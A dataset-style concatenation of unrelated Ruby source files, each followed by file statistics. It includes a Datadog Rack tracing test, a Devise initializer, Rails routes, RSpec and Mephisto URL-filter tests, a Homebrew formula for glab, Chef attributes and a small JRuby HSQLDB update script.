run(proc { |_env| [500, { 'Content-Type' => 'text/html' }, 'KO'] })
end
map '/nomemory/' do
run(proc { |_env| raise NoMemoryError, 'Non-standard error' })
end
map '/app/' do
run(proc do |env|
# this should be considered a web framework that can alter
# the request span after routing / controller processing
request_span = env[Datadog::Contrib::Rack::TraceMiddleware::RACK_REQUEST_SPAN]
request_span.resource = 'GET /app/'
request_span.set_tag('http.method', 'GET_V2')
request_span.set_tag('http.status_code', 201)
request_span.set_tag('http.url', '/app/static/')
[200, { 'Content-Type' => 'text/html' }, 'OK']
end)
end
map '/app/500/' do
run(proc do |env|
# this should be considered a web framework that can alter
# the request span after routing / controller processing
request_span = env[Datadog::Contrib::Rack::TraceMiddleware::RACK_REQUEST_SPAN]
request_span.status = 1
request_span.set_tag('error.stack', 'Handled exception')
[500, { 'Content-Type' => 'text/html' }, 'OK']
end)
end
map '/app/500/no_status/' do
run(proc do |env|
# this should be considered a web framework that can alter
# the request span after routing / controller processing
request_span = env[Datadog::Contrib::Rack::TraceMiddleware::RACK_REQUEST_SPAN]
request_span.set_tag('error.stack', 'Handled exception')
[500, { 'Content-Type' => 'text/html' }, 'OK']
end)
end
map '/leak/' do
handler = proc do
tracer.trace('leaky-span-1')
tracer.trace('leaky-span-2')
tracer.trace('leaky-span-3')
[200, { 'Content-Type' => 'text/html' }, 'OK']
end
run(handler)
end
map '/headers/' do
run(proc do |_env|
response_headers = {
'Content-Type' => 'text/html',
'Cache-Control' => 'max-age=3600',
'ETag' => '"737060cd8c284d8af7ad3082f209582d"',
'Expires' => 'Thu, 01 Dec 1994 16:00:00 GMT',
'Last-Modified' => 'Tue, 15 Nov 1994 12:45:26 GMT',
'X-Request-ID' => 'f058ebd6-02f7-4d3f-942e-904344e8cde5',
'X-Fake-Response' => 'Don\'t tag me.'
}
[200, response_headers, 'OK']
end)
end
end.to_app
end
def setup
super
# store the configuration and use a DummyTracer
@tracer = get_test_tracer
Datadog.configure do |c|
c.tracer hostname: ENV.fetch('TEST_DDAGENT_HOST', 'localhost')
c.use :http
c.use :rack, tracer: @tracer
end
end
def teardown
super
# reset the configuration
Datadog.configuration[:rack].reset_options!
end
end
| 28.547445 | 88 | 0.580926 |
218cefd87e2747a701954efc6825a8923dc8cb14 | 463 | Rails.application.routes.draw do
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
root to: redirect('/todos')
get 'todos', to: 'site#index'
get 'todos/new', to: 'site#index'
get 'todos/:id/edit', to: 'site#index'
namespace :api do
namespace :v1 do
delete '/todos/destroy_all', to: 'todos#destroy_all'
resources :todos, only: %i[index show create update destroy]
end
end
end
| 27.235294 | 102 | 0.682505 |
1da32572638adcea8bb7f7a4146fef19f3eea456 | 14,457 | # frozen_string_literal: true
# Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = 'de4523d6a800191feae0f0db1406e146468898e4155a39d2a8ab06e24c04a2f74b9e961e5aa66bf70393bbf5a6e4260ceafbef0ac963aee7365f0e6e0f28b409'
# ==> Controller configuration
# Configure the parent class to the devise controllers.
# config.parent_controller = 'DeviseController'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = '8897b51046f1d86bbac8c706a930836f2e17d6b8abd54183a20771c22c6f165a1ee54913552538100331e24188ddc4f8c72a59703e3de1cf0214d228ef21a933'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day.
# You can also set it to nil, which will allow the user to access the website
# without confirming their account.
# Default is 0.days, meaning the user cannot access the website without
# confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
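  # Illustrative migration for the unconfirmed_email column mentioned above (sketch
  # only; the :users table name is an assumption, use your own Devise model's table):
  #   add_column :users, :unconfirmed_email, :string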
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
  # Don't set too small an interval or your users won't have time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
  # :html should redirect to the sign in page when the user does not have
  # access, but formats like :xml or :json should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
# ==> Turbolinks configuration
# If your app is using Turbolinks, Turbolinks::Controller needs to be included to make redirection work correctly:
#
# ActiveSupport.on_load(:devise_failure_app) do
# include Turbolinks::Controller
# end
# ==> Configuration for :registerable
# When set to false, does not sign a user in automatically after their password is
# changed. Defaults to true, so a user is signed in automatically after changing a password.
# config.sign_in_after_change_password = true
end
| 48.19 | 154 | 0.751262 |
3871785da1241248bb6c8fc5474986bd8dd4291a | 741 | default['openstack']['network']['tun_network_bridge_interface'] = 'lo'
default['openstack']['network']['provider_network_interface'] = 'lo'
default['sample']['network']['dns'] = '1.1.1.1'
default['sample']['network']['provider']['subnet'] = '192.168.57.0/24'
default['sample']['network']['provider']['gateway'] = '192.168.57.2'
default['sample']['network']['provider']['start'] = '192.168.57.5'
default['sample']['network']['provider']['end'] = '192.168.57.25'
default['sample']['network']['selfservice']['subnet'] = '172.16.0.0/24'
default['sample']['network']['selfservice']['gateway'] = '172.16.0.1'
default['sample']['network']['selfservice']['start'] = '172.16.0.5'
default['sample']['network']['selfservice']['end'] = '172.16.0.25'
| 49.4 | 71 | 0.646424 |
e27985392ac0f5da4f2036ffbcff58a937f4ccb0 | 1,353 | require 'rails_helper'
RSpec.describe Track, type: :model do
describe 'Validations' do
let(:user) { create :user }
let(:activ) { create :activ, user: user }
it 'has a valid factory' do
track = build :track, activ: activ
expect(track).to be_valid
end
    it 'is not valid without a name' do
track = build :track, activ: activ, name: ''
expect(track).not_to be_valid
expect(track.errors[:name]).to include("can't be blank")
end
    it 'is not valid without a distance' do
track = build :track, activ: activ, distance: nil
expect(track).not_to be_valid
expect(track.errors[:distance]).to include("can't be blank")
end
    it 'is not valid without a duration' do
track = build :track, activ: activ, duration: nil
expect(track).not_to be_valid
expect(track.errors[:duration]).to include("can't be blank")
end
    it 'is not valid without a repeat' do
      track = build :track, activ: activ, repeat: nil
      expect(track).not_to be_valid
      expect(track.errors[:repeat]).to include("can't be blank")
end
it { should validate_presence_of(:name) }
it { should validate_presence_of(:duration) }
it { should validate_presence_of(:distance) }
it { should validate_presence_of(:repeat) }
end
describe 'Associations' do
it { should belong_to(:activ) }
end
end
| 28.787234 | 67 | 0.651146 |
912e8fe64d2b992aeaa20e6322b9e11199d3d24f | 1,601 | class Glab < Formula
desc "Open-source GitLab command-line tool"
homepage "https://glab.readthedocs.io/"
url "https://github.com/profclems/glab/archive/v1.18.1.tar.gz"
sha256 "ce10c93268eb58fa6d277ebd4ed6de254e4365a1a332122f597e295cc11496c3"
license "MIT"
revision 1
head "https://github.com/profclems/glab.git", branch: "trunk"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "b3053ed3b503f358326ee09ece85d31b6659835e7b35c23eb5e5e2e62e0a491a"
sha256 cellar: :any_skip_relocation, big_sur: "9a2f3821984bc6c24571cc7461be8f84cea8bfaecc78f5900ba34bc2b33e8397"
sha256 cellar: :any_skip_relocation, catalina: "c48bbd22fc04d942edc8b0041bbdaf3c095c040d47a33f4f1223da67341f867f"
sha256 cellar: :any_skip_relocation, mojave: "737ba02ba0bf3fb7c6f126b87cf0d3b265b22ba2c282f4ae582b3d2139341720"
end
depends_on "go" => :build
def install
on_macos { ENV["CGO_ENABLED"] = "1" }
system "make", "GLAB_VERSION=#{version}"
bin.install "bin/glab"
(bash_completion/"glab").write Utils.safe_popen_read(bin/"glab", "completion", "--shell=bash")
(zsh_completion/"_glab").write Utils.safe_popen_read(bin/"glab", "completion", "--shell=zsh")
(fish_completion/"glab.fish").write Utils.safe_popen_read(bin/"glab", "completion", "--shell=fish")
end
test do
system "git", "clone", "https://gitlab.com/profclems/test.git"
cd "test" do
assert_match "Clement Sam", shell_output("#{bin}/glab repo contributors")
assert_match "This is a test issue", shell_output("#{bin}/glab issue list --all")
end
end
end
| 43.27027 | 122 | 0.738289 |
876a4471ab0bcd212b6ab0b20aae8e9d71009f18 | 176 | module FreeThePaf
class App < Padrino::Application
register Padrino::Rendering
register Padrino::Mailer
register Padrino::Helpers
enable :sessions
end
end
| 17.6 | 34 | 0.732955 |
61695758a2681e901f1715cb0154c292ebc82a24 | 327 | # frozen_string_literal: true
module SimpleForm
module Inputs
class RichTextAreaInput < Base
def input(wrapper_options = nil)
merged_input_options = merge_wrapper_options(input_html_options, wrapper_options)
@builder.rich_text_area(attribute_name, merged_input_options)
end
end
end
end
| 25.153846 | 89 | 0.752294 |
623a30c66b6b708d15e953219912ca09c57c838c | 14,161 | require File.dirname(__FILE__) + '/../test_helper'
class UrlFiltersTest < ActiveSupport::TestCase
fixtures :sites, :sections, :contents
include CoreFilters, UrlFilters
def setup
@context = mock_context 'site' => sites(:first).to_liquid, 'section' => sections(:about).to_liquid
end
test "should generate archive url" do
assert_equal "/archives", archive_url(sections(:home).to_liquid)
assert_equal "/archives/foo/bar", archive_url(sections(:home).to_liquid, 'foo', 'bar')
end
test "should generate monthly url from date" do
assert_equal "/archives/2006/1", monthly_url(sections(:home).to_liquid, Date.new(2006, 1))
assert_equal "/about/archives/2006/1", monthly_url(sections(:about).to_liquid, Date.new(2006, 1))
end
test "should generate monthly url from time" do
assert_equal "/archives/2006/1", monthly_url(sections(:home).to_liquid, Time.utc(2006, 1))
assert_equal "/about/archives/2006/1", monthly_url(sections(:about).to_liquid, Time.utc(2006, 1))
end
test "should generate monthly url from string" do
assert_equal "/archives/2006/1", monthly_url(sections(:home).to_liquid, '2006-1')
assert_equal "/about/archives/2006/1", monthly_url(sections(:about).to_liquid, '2006-1-4')
end
test "should generate monthly link" do
assert_equal "<a href=\"/archives/2006/1\" title=\"January 2006\">January 2006</a>", link_to_month(sections(:home).to_liquid, '2006-1')
end
test "should generate paged url" do
assert_equal "/about", page_url(contents(:welcome).to_liquid(:page => true))
assert_equal "/about/welcome-to-mephisto", page_url(contents(:welcome).to_liquid)
assert_equal "/about/about-this-page", page_url(contents(:about).to_liquid)
end
test "should generate paged url when site has paged home section" do
@context = mock_context 'site' => sites(:hostess).to_liquid, 'section' => sections(:cupcake_home).to_liquid
assert_equal "/", page_url(contents(:cupcake_welcome).to_liquid(:page => true))
assert_equal "/welcome-to-cupcake", page_url(contents(:cupcake_welcome).to_liquid)
end
test "should generate paged url for home section" do
assert_equal "/", page_url(contents(:welcome).to_liquid(:page => true), sections(:home).to_liquid)
assert_equal "/welcome-to-mephisto", page_url(contents(:welcome).to_liquid, sections(:home).to_liquid)
end
test "should generate section links" do
other_section = link_to_section(sections(:home).to_liquid)
home_section = link_to_section(sections(:about).to_liquid)
assert_match %r(href="/"), other_section
assert_match %r(href="/about"), home_section
assert_match %r(class="selected"), home_section
assert_no_match %r(class="selected"), other_section
assert_match %r(title="#{sections(:home).name}"), other_section
assert_match %r(title="#{sections(:about).name}"), home_section
end
test "should generate asset urls" do
assert_equal "/javascripts/foo.js", javascript_url('foo.js')
assert_equal "/stylesheets/foo.css", stylesheet_url('foo.css')
assert_equal "/images/foo.gif", asset_url('foo.gif')
end
test "should include javascript tag" do
script = javascript('foo')
assert_match /^<script/, script
assert_match %r(src="/javascripts/foo.js"), script
end
test "should link stylesheet tag" do
css = stylesheet('foo')
assert_match /^<link/, css
assert_match %r(href="/stylesheets/foo.css"), css
end
test "should create image tag" do
img = img_tag('foo.gif')
assert_match /^<img/, img
assert_match %r(src="/images/foo.gif"), img
assert_match %r(alt="foo"), img
end
test "should generate tag urls" do
assert_equal "/tags", tag_url
assert_equal "/tags/foo", tag_url('foo')
assert_equal "/tags/foo/bar", tag_url('foo', 'bar')
assert_equal '/tags/foo%20bar', tag_url('foo bar')
end
test "should generate tag links" do
assert_equal "<a href=\"/tags/foo\" rel=\"tag\" title=\"foo\">foo</a>", link_to_tag('foo')
end
test "should generate search urls" do
assert_equal '/search?q=abc', search_url('abc')
assert_equal '/search?q=abc&page=2', search_url('abc', 2)
end
test "should generate atom auto discovery tag" do
content = atom_feed('/feed/foo')
assert_match /^<link /, content
assert_match /rel="alternate"/, content
assert_match /type="application\/atom\+xml"/, content
assert_match /href="\/feed\/foo"/, content
assert_no_match /title/, content
end
test "should generate atom auto discovery tag with title" do
content = atom_feed('foo', 'bar')
assert_match /title="bar"/, content
end
test "should show all comments feed" do
content = all_comments_feed
assert_match /href="\/feed\/all_comments.xml"/, content
assert_match /title="All Comments"/, content
end
test "should show all comments feed with custom title" do
content = all_comments_feed "All Lame Comments"
assert_match /title="All Lame Comments"/, content
end
test "should show section comments feed" do
content = comments_feed(sections(:home).to_liquid)
assert_match /href="\/feed\/comments.xml"/, content
assert_match /title="Comments for Home"/, content
end
test "should show section comments feed with custom title" do
content = comments_feed(sections(:about).to_liquid, "About Comments")
assert_match /href="\/feed\/about\/comments.xml"/, content
assert_match /title="About Comments"/, content
end
test "should show section articles feed" do
content = articles_feed(sections(:home).to_liquid)
assert_match /href="\/feed\/atom.xml"/, content
assert_match /title="Articles for Home"/, content
end
test "should show section articles feed with custom title" do
content = articles_feed(sections(:about).to_liquid, "About Articles")
assert_match /href="\/feed\/about\/atom.xml"/, content
assert_match /title="About Articles"/, content
end
test "should html encode anchor text" do
unencoded = 'Tom & Jerry'
contents(:welcome).title = unencoded
@article = contents(:welcome).to_liquid
@article.context = @context
@context['section'].instance_variable_get(:@liquid)['name'] = unencoded
    assert_match %r{>Tom &amp; Jerry<\/a>}, link_to_article(@article)
    assert_match %r{>Tom &amp; Jerry<\/a>}, link_to_page(@article)
    assert_match %r{>Tom &amp; Jerry<\/a>}, link_to_section(@context['section'])
    assert_match %r{>Tom &amp; Jerry<\/a>}, link_to_tag(unencoded)
end
test "should link to search result with article link" do
@article = contents(:welcome).to_liquid
@article.context = @context
@context['section'] = nil
assert_match /href="\/\d{4}\/\d+\/\d+\/welcome-to-mephisto"/, link_to_search_result(@article)
end
test "should link to search result with page link" do
@article = contents(:welcome).to_liquid(:page => true)
@article.context = @context
@article2 = contents(:another).to_liquid
@article2.context = @context
assert_match /href="\/about"/, link_to_search_result(@article)
assert_match /href="\/about\/another-welcome-to-mephisto"/, link_to_search_result(@article2)
end
end
class LinkToUrlFiltersTest < ActiveSupport::TestCase
fixtures :sites, :sections, :contents
include CoreFilters, UrlFilters
def setup
@context = mock_context 'site' => sites(:first).to_liquid
@section = sections(:about).to_liquid
@article = contents(:welcome).to_liquid
@paged_article = contents(:about).to_liquid
@article.context = @paged_article.context = @context
end
test "should generate links with custom text" do
pattern = %r(^<a href="[^"]+" (?:rel="tag" )?title="Custom text">Custom text</a>$)
args = 'Custom text'
assert_match pattern, link_to_article(@article, args)
assert_match pattern, link_to_page(@article, @section, args)
assert_match pattern, link_to_section(@section, args)
assert_match pattern, link_to_comments(@article, args)
assert_match pattern, link_to_tag('foo', args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', args)
assert_match pattern, link_to_search_result(@article, args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, args)
end
test "should generate links with custom title attribute" do
pattern = %r(^<a href="[^"]+" (?:rel="tag" )?title="Custom title">)
args = [nil, 'Custom title']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should generate links with custom id attribute" do
pattern = %r(^<a href="[^"]+" id="custom-id" (?:rel="tag" )?title="[^"]+">)
args = [nil, nil, 'custom-id']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should generate links with custom class attribute" do
pattern = %r(^<a class="custom-class" href="[^"]+" (?:rel="tag" )?title="[^"]+">)
args = [nil, nil, nil, 'custom-class']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should generate links with custom rel attribute" do
pattern = %r(^<a href="[^"]+" rel="custom-rel" title="[^"]+">)
args = [nil, nil, nil, nil, 'custom-rel']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should html encode custom attributes" do
pattern = %r(^<a class="custom&class" href="[^"]+" id="custom&id" rel="custom&rel" title="Custom & title">Custom & text</a>$)
args = ['Custom & text', 'Custom & title', 'custom&id', 'custom&class', 'custom&rel']
assert_match pattern, link_to_article(@article, *args)
assert_match pattern, link_to_page(@article, @section, *args)
assert_match pattern, link_to_section(@section, *args)
assert_match pattern, link_to_comments(@article, *args)
assert_match pattern, link_to_tag('foo', *args)
assert_match pattern, link_to_month(@section, '2006-1', 'my', *args)
assert_match pattern, link_to_search_result(@article, *args)
@context['section'] = @section
assert_match pattern, link_to_search_result(@paged_article, *args)
end
test "should generate page links with selected class appended to custom class attribute" do
pattern = %r(class="custom-class selected")
args = [nil, nil, nil, 'custom-class']
@context['section'] = @section
@context['article'] = @paged_article
assert_match pattern, link_to_page(@paged_article, @section, *args)
assert_no_match pattern, link_to_page(@article, @section, *args)
end
test "should generate section links with selected class appended to custom class attribute" do
pattern = %r(class="custom-class selected")
args = [nil, nil, nil, 'custom-class']
@context['section'] = @section
assert_match pattern, link_to_section(@section, *args)
assert_no_match pattern, link_to_section(sections(:home).to_liquid, *args)
end
end
class ArticleUrlFiltersTest < ActiveSupport::TestCase
fixtures :sites, :sections, :contents
include CoreFilters, UrlFilters
def setup
@context = mock_context 'site' => sites(:first).to_liquid
@article = contents(:welcome).to_liquid
@article.context = @context
@permalink = @article.url
end
test "should show article comments feed" do
content = comments_feed(@article)
assert_match /href="#{@permalink}\/comments\.xml"/, content
assert_match /title="Comments for Welcome to Mephisto"/, content
end
test "should show article comments feed with custom title" do
content = comments_feed(@article, "Welcome Comments")
assert_match /title="Welcome Comments"/, content
end
test "should show article changes feed" do
content = changes_feed(@article)
assert_match /href="#{@permalink}\/changes\.xml"/, content
assert_match /title="Changes for Welcome to Mephisto"/, content
end
test "should show article changes feed with custom title" do
content = changes_feed(@article, "Welcome Changes")
assert_match /title="Welcome Changes"/, content
end
end
| 42.525526 | 149 | 0.694513 |
87cc1cc4397f5b551761bcb8a0dd8c42812261ee | 175 | class NewsNotification < ActiveRecord::Base
validates_presence_of :title, :body
default_scope -> { order(updated_at: :desc) }
scope :active, -> { where(active: true) }
end
| 29.166667 | 46 | 0.731429 |
0166856d11dfe30e4ba55821f3fc396aaa241396 | 425 | module NLBSG
class GetAvailabilityInfoResponse < ResponseBase
def initialize(response)
super(response.to_hash[:get_availability_info_response])
end
def next_record_position
@response[:next_record_position]
end
def set_id
@response[:set_id]
end
def items
wrap_in_array(@response.dig(:items, :item))
end
def fetch_next_records
p "TODO"
end
end
end
| 17 | 62 | 0.677647 |
61a750bb5caab6b3a7d4dcd4e8cd0cc42d676fae | 136 | class AddRedcapIdToParticipants < ActiveRecord::Migration[6.0]
def change
add_column :participants, :redcap_id, :string
end
end
| 22.666667 | 62 | 0.772059 |
61991c3989107aa89101b3de7a6c6b9df9d722dd | 217 | class AddOmniauthToUsers < ActiveRecord::Migration[5.1]
def change
add_column :users, :provider, :string
add_index :users, :provider
add_column :users, :uid, :string
add_index :users, :uid
end
end
| 24.111111 | 55 | 0.705069 |
6aed7bd44a7dcf83e30d572a2ffc91c6cecfef34 | 53 | module Mtg
class Setting < Sequel::Model
end
end
| 10.6 | 31 | 0.716981 |
2114843b6c41fa6df5333d6eae01e4f827d557a5 | 755 | #! /usr/bin/jruby
# -*- coding: utf-8 -*-
#
# hsqldb_update.rb
#
# Jan/29/2015
# ------------------------------------------------------------
#
include Java
import java.sql.DriverManager
import java.lang.System
#
require 'date'
#
load '/var/www/data_base/common/jruby_common/jruby_sql_manipulate.rb'
#
# ------------------------------------------------------------
puts "*** 開始 ***"
#
#
id_in = ARGV[0]
population_in = ARGV[1].to_i
#
puts id_in,population_in
#
str_connect = "jdbc:hsqldb:file:/var/tmp/hsqldb/cities;shutdown=true"
#
conn = DriverManager.getConnection(str_connect,"SA", "")
sql_update_proc(conn,id_in,population_in)
sql_read_proc(conn)
conn.close()
#
puts "*** 終了 ***"
#
# ------------------------------------------------------------
| 19.868421 | 69 | 0.528477 |
ffe9b4fb4cad96f6894648765e90a651e9085901 | 590 | require 'spec_helper'
describe 'rabbitmq::policy_management' do
let(:runner) { ChefSpec::ServerRunner.new(REDHAT_OPTS) }
let(:node) { runner.node }
let(:chef_run) do
runner.converge(described_recipe)
end
let(:file_cache_path) { Chef::Config[:file_cache_path] }
it 'includes the `default` recipe' do
expect(chef_run).to include_recipe('rabbitmq::default')
end
it 'sets a rabbitmq policy ha-all' do
expect(chef_run).to set_rabbitmq_policy('ha-all')
end
it 'sets a rabbitmq policy ha-two' do
expect(chef_run).to set_rabbitmq_policy('ha-two')
end
end
| 24.583333 | 59 | 0.716949 |
